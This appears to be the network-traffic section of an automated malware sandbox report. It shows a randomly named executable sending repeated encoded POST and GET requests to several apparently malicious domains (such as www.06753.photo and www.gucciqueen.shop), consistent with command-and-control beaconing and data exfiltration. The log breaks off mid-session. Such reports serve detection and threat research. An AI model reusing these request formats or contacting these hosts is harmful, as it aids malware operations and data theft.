                                                                            Data Ascii: UTJ0bhC=IpgPCcaOMujF4hxrfjFUpwITsmxkaYRv2wmM4Gs1kCUdrdHBNh4JKXA3Quy5VGSjCtIlQyYSShFaKQ8lvyxwvqbij+tZf1QmCQUsj6yNxz2y8xAriYAqYEjWMTr0M8OdBwgZyW8EGjsBpztUhFjFs6MvjFG9jxIV+/1Ns71fNYmEN6BIxHzCCDvb96Fcy4RCoHol4LkoK+eYGYqv1Vza08jrRBUdfQw0gMV/wIbPNAD0uhfdIzw5S+wp5FS3kBKDwjmqQkia5eT6XN7GZJ5LUX0sJiNVvFFBq5eoMds18K25S4SJtK4fj0wrGCTJMs7SARwZiFWwdDX75FUHoyN6yT1pT8lc88jtZqs0icmYu/RymI1CV5+pqonmwTauONAprX75WqV085nN8tVf9k4Pw5OocZTSVnqaNIk54KRnvQLgfjZHRL2sgY9aLMiuTvMzi3URRJYtCyZn9qfkmzjoBrlgk5luzuf38v/AyNOhX8nIPpYU0UbI3lbN2WwiIMaDqOh25+04Y419sUV53FT+fe+wI0Q5kX2y5GQOiS54EOO3HEHpiRGBXcolHlwK/xXPL7qOLBUqRLmqc0MPi1J7tXfC8i4bO99K0pSS1gwBs3qvEiSr+NXml6/LavNelPkIuQZuvF0KmCKVgg1CchDKsvb22Fs6NEK/xXon8K4DtaVfYWrX5LQEwgsuy0WzhSafXSBzTbaTCR2kr9SpcRHLlWmLo7vuQ9PgtCoEqbarBsfhij7f1isuGyqyGS2cDkg0H6NSwATEKh3h/aq1v7p+/jbIoQLniNTyM5Z2F/Nb8Altndwqc87NsRFG4MLEyw6b0/fTf0uvbzBIx/7Bijzvk02p9C3r+DPDWNbdcSikgA5d82qTxE7CtAEEwDzKxCA4HFcTKCIbCYCRDNxGOISrESlL1C+268R6Awim29u/q6j4HpZj6TEH4T+oQyAbG3ZEOO2f3TDTLTvi9bsnBjBLhNea8R3/cf7QCPPdlsnzAa0j [TRUNCATED]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            28192.168.2.55000274.48.34.43801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:25:55.028652906 CET531OUTGET /uwg4/?UTJ0bhC=FrIvBq+7M+fO4hFqHVkj/h0MgBQBdbkSyhygt3ownjEqtb7lfSc+JwlWQ4K/WGS3VMA0fSxFYiNdEScU0GRMxZDLyu9hbg86BnUYxIHc13WjzD0wj4NYGBX3EB3iY/brcg==&Pt=fDlHoNWP0RBd HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.bioart.buzz
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Dec 10, 2024 16:25:56.549738884 CET1191INHTTP/1.1 404 Not Found
                                                                            Server: openresty/1.19.3.1
                                                                            Date: Tue, 10 Dec 2024 15:25:56 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Content-Length: 982
                                                                            Connection: close
                                                                            X-Cache: MISS from kangle web server
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 27 6d 61 69 6e 27 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 3c 69 3e 3c 68 32 3e 53 6f 6d 65 74 68 69 6e 67 20 65 72 72 6f 72 3a 3c 2f 68 32 3e 3c 2f 69 3e 0a 3c 70 3e 3c 68 33 3e 34 30 34 3c 2f 68 33 3e 3c 68 33 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 27 72 65 64 27 3e 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 2e 3c 2f 66 6f 6e 74 3e 3c 2f 68 33 3e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 6f 72 20 3c 61 20 68 72 65 66 3d 27 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 27 3e 74 72 79 20 61 67 61 69 6e 3c 2f 61 [TRUNCATED]
                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>404</title></head><body><div id='main' ><i><h2>Something error:</h2></i><p><h3>404</h3><h3><font color='red'>No such file or directory.</font></h3></p><p>Please check or <a href='javascript:location.reload()'>try again</a> later.</p><div>hostname: kangle web server</div><hr><div id='pb'>Generated by <a href='javascript: var code=404' >kangle/3.5.21.16</a>.</div></div><script language='javascript'>var referer = escape(document.referrer);var url = escape(document.URL);var msg = 'No%20such%20file%20or%20directory.'; var hostname='kangle web server';var event_id='';var aaaaaaa = ('<scr'+'ipt language="javascript" src="https://error.kangleweb.net/?code=404&vh=594445"></scr' + 'ipt>');</script>... padding for ie -->... padding for ie -->... padding for ie -->... padding for ie -->... 673800cf --></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            29192.168.2.55000323.167.152.41801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:26:03.454128027 CET782OUTPOST /4i55/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.06753.photo
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.06753.photo
                                                                            Referer: http://www.06753.photo/4i55/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 6a 32 6b 59 30 47 69 61 2b 67 77 42 6f 38 71 74 36 38 61 4e 31 47 68 56 56 30 74 38 50 44 66 45 31 6c 4f 2f 30 6e 2f 38 65 4c 4a 46 66 34 79 43 67 4b 6d 6b 2f 32 6d 64 59 72 38 35 53 6f 48 65 75 4d 51 69 33 75 79 57 78 70 39 4d 75 42 70 74 6b 59 6c 31 6d 6d 4c 30 6c 6b 56 38 75 4f 38 7a 55 59 4d 43 68 43 71 77 5a 75 68 62 64 47 57 6f 50 69 74 70 30 4f 74 54 72 48 59 61 4d 4f 42 69 79 54 32 46 68 49 49 76 4c 54 6e 33 2f 38 6d 71 2b 62 37 72 52 73 79 4d 44 68 41 49 79 79 4b 76 56 69 38 54 41 58 59 39 37 4c 66 46 6a 62 54 62 42 62 5a 4e 65 78 33 68 42 50 70 34 2b 57 56 79 73 76 58 4c 36 35 77 3d
                                                                            Data Ascii: UTJ0bhC=j2kY0Gia+gwBo8qt68aN1GhVV0t8PDfE1lO/0n/8eLJFf4yCgKmk/2mdYr85SoHeuMQi3uyWxp9MuBptkYl1mmL0lkV8uO8zUYMChCqwZuhbdGWoPitp0OtTrHYaMOBiyT2FhIIvLTn3/8mq+b7rRsyMDhAIyyKvVi8TAXY97LfFjbTbBbZNex3hBPp4+WVysvXL65w=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            30192.168.2.55000423.167.152.41801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:26:06.110238075 CET802OUTPOST /4i55/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.06753.photo
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.06753.photo
                                                                            Referer: http://www.06753.photo/4i55/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 6a 32 6b 59 30 47 69 61 2b 67 77 42 71 63 36 74 39 76 79 4e 39 47 68 57 4d 55 74 38 61 7a 66 41 31 6c 53 2f 30 6b 7a 73 65 59 74 46 66 61 71 43 79 37 6d 6b 38 32 6d 64 58 4c 38 38 57 6f 48 46 75 4d 56 42 33 75 4f 57 78 70 70 4d 75 42 35 74 6b 76 78 71 6c 57 4c 4d 74 45 56 2b 71 4f 38 7a 55 59 4d 43 68 47 37 34 5a 75 4a 62 63 33 47 6f 4f 41 56 71 35 75 74 51 36 48 59 61 62 65 41 72 79 54 33 69 68 4a 55 56 4c 52 66 33 2f 2f 79 71 2b 50 76 30 59 73 79 47 4d 42 42 6e 6a 69 54 48 63 54 55 4d 66 30 68 4d 6c 39 72 52 76 4e 69 78 62 35 52 6c 4e 52 62 5a 52 63 68 50 76 6d 30 62 32 4d 48 37 6b 75 6e 73 32 64 35 31 5a 79 4a 75 36 57 4f 70 73 48 6f 7a 42 43 37 57
                                                                            Data Ascii: UTJ0bhC=j2kY0Gia+gwBqc6t9vyN9GhWMUt8azfA1lS/0kzseYtFfaqCy7mk82mdXL88WoHFuMVB3uOWxppMuB5tkvxqlWLMtEV+qO8zUYMChG74ZuJbc3GoOAVq5utQ6HYabeAryT3ihJUVLRf3//yq+Pv0YsyGMBBnjiTHcTUMf0hMl9rRvNixb5RlNRbZRchPvm0b2MH7kuns2d51ZyJu6WOpsHozBC7W


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            31192.168.2.55000523.167.152.41801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:26:08.778256893 CET1819OUTPOST /4i55/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.06753.photo
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 1244
                                                                            Origin: http://www.06753.photo
                                                                            Referer: http://www.06753.photo/4i55/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 6a 32 6b 59 30 47 69 61 2b 67 77 42 71 63 36 74 39 76 79 4e 39 47 68 57 4d 55 74 38 61 7a 66 41 31 6c 53 2f 30 6b 7a 73 65 59 6c 46 66 76 32 43 67 6f 2b 6b 39 32 6d 64 65 72 38 39 57 6f 47 46 75 4d 74 64 33 75 44 30 78 71 52 4d 76 69 42 74 69 62 64 71 2b 47 4c 4d 68 6b 56 37 75 4f 39 70 55 5a 38 47 68 43 66 34 5a 75 4a 62 63 31 75 6f 65 69 74 71 37 75 74 54 72 48 59 47 4d 4f 42 4f 79 54 2f 59 68 4a 51 46 4c 6c 6a 33 38 66 69 71 38 36 37 30 46 63 79 49 4a 42 42 2f 6a 69 76 59 63 54 59 49 66 31 46 71 6c 36 66 52 74 4b 50 47 49 64 45 39 51 6e 54 36 61 2b 64 4e 79 57 35 2b 2f 4f 62 70 37 73 33 59 35 74 6c 6d 61 45 4e 55 32 33 6e 33 31 43 6f 2f 57 30 43 72 63 47 48 66 4d 57 72 4f 75 55 57 44 54 37 65 34 69 67 54 58 34 4c 70 70 39 76 53 78 56 5a 54 34 47 49 34 31 64 6e 6d 48 48 61 76 6b 71 50 4e 6d 38 74 38 65 38 73 6d 74 75 33 54 6c 49 32 2b 52 39 6f 6d 46 33 44 6a 4c 2f 65 4a 43 54 6c 4b 35 6c 6f 6f 50 50 31 61 76 35 54 71 5a 71 38 4e 44 74 53 2f 77 38 5a 72 2b 57 62 41 6f 67 76 [TRUNCATED]
                                                                            Data Ascii: UTJ0bhC=j2kY0Gia+gwBqc6t9vyN9GhWMUt8azfA1lS/0kzseYlFfv2Cgo+k92mder89WoGFuMtd3uD0xqRMviBtibdq+GLMhkV7uO9pUZ8GhCf4ZuJbc1uoeitq7utTrHYGMOBOyT/YhJQFLlj38fiq8670FcyIJBB/jivYcTYIf1Fql6fRtKPGIdE9QnT6a+dNyW5+/Obp7s3Y5tlmaENU23n31Co/W0CrcGHfMWrOuUWDT7e4igTX4Lpp9vSxVZT4GI41dnmHHavkqPNm8t8e8smtu3TlI2+R9omF3DjL/eJCTlK5looPP1av5TqZq8NDtS/w8Zr+WbAogvlAlQq+X7ItVGCy/nMhZoe+oabl5HEUuG6sW1KEfd0cit6bTcWerbobSAWnvrer2zyIGwC1VPw/yTigHeg5uygtTq4dqop4yW7Fvm0gwVBf+exsgM/42KzB9H3MynEXdkw0Xve/scKVBdQhBv+GGI7fkqSlQBw4eCN4r2BI2pzl9odvLnt6avjRF+o4BXSjJ1/cFHlDqSHrYzbxCc1KezCSLetfenf+61Gqb2NGq54pyvGbRuHgrycZE36tuT0xugiG13dZX33/W2qNvnDj80EpJdNATMIQ2PEGxelbB7d1/gFF6l6Abbr8njwmTiL1LNr5m1BPgcEb2n3FpGcwGq8Nb/6he2NfBOF+vM5T4DxHA86iBiQMFo4NpApP8JfiQs2LBo3omwiTplNlfC53nXpeKKuIzl8FdACO0OjlkaP2KUKC2msL13nD0zHAPqWe0cJtc9lH6Z400gpoSX31flaUajQ6k5pdZzl7XRrs1SbZyuAqn4NSmQN4alNqmptk4OHNb1QhLu8tNAqFPPDZL5rnjmA1INAQXJNR3gpMrosAarR6/9gyQfUuInxTDEkgBoR7KAd/aij4qcBra4onh+ukJr9gzGWYClL1dtaO0ghYw0jfNrjxBp+icMNtSW5Ea/s/OKb1jWbXlFk0jze6Eg6/aUOM6twoH5qO [TRUNCATED]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            32192.168.2.55000623.167.152.41801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:26:11.524070024 CET531OUTGET /4i55/?Pt=fDlHoNWP0RBd&UTJ0bhC=u0M432eX/xZzvajH7Zn4oj16d1M/QQvp1keQ4HSaLqVhf5mFg72lw0bKX+EdY5KNk4RXhc2Czo9qgjxQ7/1U7lrsyz5+vZkdL+U3wCm0CZUZdVO/eyd7jrB+924QONEljg== HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.06753.photo
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            33192.168.2.550007178.79.184.196801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:26:18.420305967 CET794OUTPOST /tgvj/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.gucciqueen.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.gucciqueen.shop
                                                                            Referer: http://www.gucciqueen.shop/tgvj/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 45 78 32 35 61 64 59 74 6b 71 4f 42 42 45 4a 66 7a 77 71 51 6a 30 56 4b 78 57 42 5a 45 52 54 69 42 6d 69 50 50 4f 46 6a 6f 76 66 37 67 31 71 50 45 58 5a 56 2b 50 6b 63 4e 78 31 4c 37 51 47 4e 52 51 54 43 39 36 76 30 71 69 70 57 63 55 69 4e 65 44 79 6f 6d 36 67 36 55 59 77 79 4b 59 6e 51 75 48 2f 57 63 63 4f 30 74 34 32 52 42 30 6b 34 45 48 48 63 78 68 46 4d 37 46 44 4d 64 61 64 4a 30 56 57 63 50 57 66 53 30 61 64 71 38 42 4b 61 6f 51 30 57 64 67 43 44 6c 69 32 67 72 68 58 37 63 42 34 4f 75 48 46 2f 46 4e 4c 58 6d 63 52 51 74 34 70 42 55 57 45 43 42 79 79 37 6f 78 67 64 39 6a 79 62 6c 63 30 3d
                                                                            Data Ascii: UTJ0bhC=Ex25adYtkqOBBEJfzwqQj0VKxWBZERTiBmiPPOFjovf7g1qPEXZV+PkcNx1L7QGNRQTC96v0qipWcUiNeDyom6g6UYwyKYnQuH/WccO0t42RB0k4EHHcxhFM7FDMdadJ0VWcPWfS0adq8BKaoQ0WdgCDli2grhX7cB4OuHF/FNLXmcRQt4pBUWECByy7oxgd9jyblc0=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            34192.168.2.550008178.79.184.196801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:26:21.081820965 CET814OUTPOST /tgvj/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.gucciqueen.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.gucciqueen.shop
                                                                            Referer: http://www.gucciqueen.shop/tgvj/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 45 78 32 35 61 64 59 74 6b 71 4f 42 48 6b 35 66 32 57 69 51 76 45 56 46 74 47 42 5a 64 42 54 6d 42 6d 6d 50 50 4c 6c 7a 6f 64 4c 37 68 58 79 50 46 53 74 56 2f 50 6b 63 46 52 31 43 2f 51 47 47 52 51 76 56 39 36 6a 30 71 69 39 57 63 57 36 4e 65 30 65 72 67 71 67 34 5a 34 77 77 45 34 6e 51 75 48 2f 57 63 63 61 65 74 34 75 52 42 6d 77 34 46 6d 47 75 38 42 46 50 79 6c 44 4d 50 71 64 4e 30 56 57 45 50 53 58 30 30 59 56 71 38 44 69 61 70 45 59 56 48 77 43 4a 6f 43 33 4f 69 68 6d 77 54 77 34 5a 71 45 6f 33 62 74 50 5a 71 4b 67 36 33 61 68 70 48 32 6f 36 52 68 36 4d 35 42 42 30 6e 41 69 72 37 4c 67 43 57 6c 38 36 4c 68 61 68 69 41 5a 77 47 64 46 48 66 6b 62 43
                                                                            Data Ascii: UTJ0bhC=Ex25adYtkqOBHk5f2WiQvEVFtGBZdBTmBmmPPLlzodL7hXyPFStV/PkcFR1C/QGGRQvV96j0qi9WcW6Ne0ergqg4Z4wwE4nQuH/Wccaet4uRBmw4FmGu8BFPylDMPqdN0VWEPSX00YVq8DiapEYVHwCJoC3OihmwTw4ZqEo3btPZqKg63ahpH2o6Rh6M5BB0nAir7LgCWl86LhahiAZwGdFHfkbC


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            35192.168.2.550009178.79.184.196801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:26:23.752264023 CET1831OUTPOST /tgvj/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.gucciqueen.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 1244
                                                                            Origin: http://www.gucciqueen.shop
                                                                            Referer: http://www.gucciqueen.shop/tgvj/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 45 78 32 35 61 64 59 74 6b 71 4f 42 48 6b 35 66 32 57 69 51 76 45 56 46 74 47 42 5a 64 42 54 6d 42 6d 6d 50 50 4c 6c 7a 6f 64 7a 37 67 6d 53 50 48 78 46 56 38 50 6b 63 4c 78 31 50 2f 51 47 68 52 51 48 5a 39 36 2f 4b 71 68 46 57 54 54 75 4e 58 6c 65 72 70 71 67 34 46 49 77 39 4b 59 6d 53 75 48 76 53 63 63 4b 65 74 34 75 52 42 6e 41 34 4d 58 47 75 36 42 46 4d 37 46 44 36 64 61 64 70 30 56 4f 2b 50 53 62 43 6f 34 31 71 35 54 79 61 75 78 30 56 66 67 43 48 72 43 33 67 69 68 71 2f 54 77 6b 6a 71 45 73 64 62 76 66 5a 76 74 64 62 6a 36 64 68 5a 32 34 73 66 52 32 74 70 32 52 45 71 52 6d 32 77 73 41 64 4b 58 38 73 4c 52 69 57 32 6b 4e 67 55 38 55 56 5a 6a 79 77 78 69 4f 43 4b 54 78 4a 75 6a 41 42 4c 75 55 2b 4b 6e 33 77 47 65 78 54 50 58 63 72 36 4f 48 49 4a 72 47 6c 45 55 4e 65 58 44 54 62 55 2f 69 70 31 69 34 51 4b 6d 55 67 6e 42 5a 36 72 31 53 71 41 6a 49 6f 4f 4d 45 70 62 4f 64 33 68 31 71 76 56 55 6e 4a 4e 4f 69 69 4a 64 66 63 53 53 42 76 65 39 71 32 55 6f 63 59 62 37 6e 66 36 33 [TRUNCATED]
                                                                            Data Ascii: UTJ0bhC=Ex25adYtkqOBHk5f2WiQvEVFtGBZdBTmBmmPPLlzodz7gmSPHxFV8PkcLx1P/QGhRQHZ96/KqhFWTTuNXlerpqg4FIw9KYmSuHvSccKet4uRBnA4MXGu6BFM7FD6dadp0VO+PSbCo41q5Tyaux0VfgCHrC3gihq/TwkjqEsdbvfZvtdbj6dhZ24sfR2tp2REqRm2wsAdKX8sLRiW2kNgU8UVZjywxiOCKTxJujABLuU+Kn3wGexTPXcr6OHIJrGlEUNeXDTbU/ip1i4QKmUgnBZ6r1SqAjIoOMEpbOd3h1qvVUnJNOiiJdfcSSBve9q2UocYb7nf63I3LkOtWVWMbXydrONY5spvS5L3NAjsHJnkN2IzxWVYlkabAK9v/zoxgGDXfBhoSpUXZDUvtuqYFPGqQpiHZndRdEq/GfHUDWAE0tsOiS5Q7lfu6dgC3uMnOMt2SRt+LaG5SAtsmvQTBSP8nm3LqiE+e7Iy7WbljcP5tf24R1ShDivJLWZ39FxfMwriZtNquIt1I5gwoR9Oew7QXQ2AO+F7Q7LVWRWI0JYP8/pTovwDEbXXMC7UAqHq5XAR2HNiaFx6HY0BwpCCYWUt+zVG0ds/H9J0Sq7EaJDXt5JHwxjqZ0acDpC/07xv3eX6NCba9Q8d0WIACEb5Be/we8xQCrnztuzcxCvCmYj6NbnKf9GZAcmvWB2JOyH+Q876vMAfXjBmB+e5lcbwM+Mhc+scPA5cDUoN3Hj/B852F3G4cgevT2C6BhrBUq9/JcKW91vnhcfhA5kr0JFHM42M5nHGcQzRm8q9a+g+SUsmXNjWU9L7Mr0NcW2SBlv2PCBbYZOBZOaOVnQImzKG3h1+RnaO4jPppEIKhqN+MJ4nz8yJAR4IUozfTSzSMoOqdhoFcAofqnYYRkHd8qaWEyXAoB9K06KC0P3gCLl2RzpjuoVDPBBwZyqzZOs3Sfx5RoZP1hjjNVQ/AghgvqQ6Pz3s9I/WPYEb3RdIRcEKr00/ [TRUNCATED]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            36192.168.2.550010178.79.184.196801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:26:26.404894114 CET535OUTGET /tgvj/?UTJ0bhC=JzeZZokphZySGFVIg3fW0H54lk8TDwrrWR2sEOIWidbOqUuKdhJmv9JQEF9O1RD5XyTbq6Omqzt9QHi6LTaoobUAF4YLNuHihjnBZMeTneWuYVNORWnArhJV2H75YPAzvg==&Pt=fDlHoNWP0RBd HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.gucciqueen.shop
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Dec 10, 2024 16:26:32.875821114 CET461INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 10 Dec 2024 15:26:32 GMT
                                                                            Server: Apache/2.4.62 (Debian)
                                                                            Content-Length: 281
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            37192.168.2.55001145.79.252.94801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:26:39.159554958 CET803OUTPOST /p39a/ HTTP/1.1
